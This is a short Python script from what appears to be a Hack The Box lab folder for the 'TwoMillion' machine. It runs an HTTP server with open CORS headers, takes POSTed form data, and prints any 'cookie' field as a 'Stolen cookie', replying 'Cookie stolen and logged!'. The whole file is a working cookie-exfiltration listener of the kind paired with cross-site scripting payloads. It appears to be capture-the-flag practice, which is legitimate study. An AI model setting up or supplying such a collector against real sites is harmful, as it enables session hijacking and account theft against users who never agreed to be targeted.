fake_server.py

File: htb/retired_easy_machines/twomillion/fake_server.py

import http.server
import socketserver
import urllib.parse

PORT = 8081

class MyHandler(http.server.SimpleHTTPRequestHandler):
    def do_OPTIONS(self):

        self.send_response(200)
        self.send_header('Access-Control-Allow-Origin', '*')
        self.send_header('Access-Control-Allow-Methods', 'POST, GET, OPTIONS')
        self.send_header('Access-Control-Allow-Headers', 'Content-Type')
        self.end_headers()

    def do_POST(self):

        content_length = int(self.headers['Content-Length'])
        post_data = self.rfile.read(content_length)
        decoded_data = urllib.parse.parse_qs(post_data.decode('utf-8'))


        if 'cookie' in decoded_data:
            print(f"Stolen cookie: {decoded_data['cookie'][0]}")


        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.send_header('Access-Control-Allow-Origin', '*')
        self.send_header('Access-Control-Allow-Methods', 'POST, GET, OPTIONS')
        self.send_header('Access-Control-Allow-Headers', 'Content-Type')
        self.end_headers()
        self.wfile.write(b'Cookie stolen and logged!')


with socketserver.TCPServer(("", PORT), MyHandler) as httpd:
    print(f"Serving on port {PORT}...")
    httpd.serve_forever()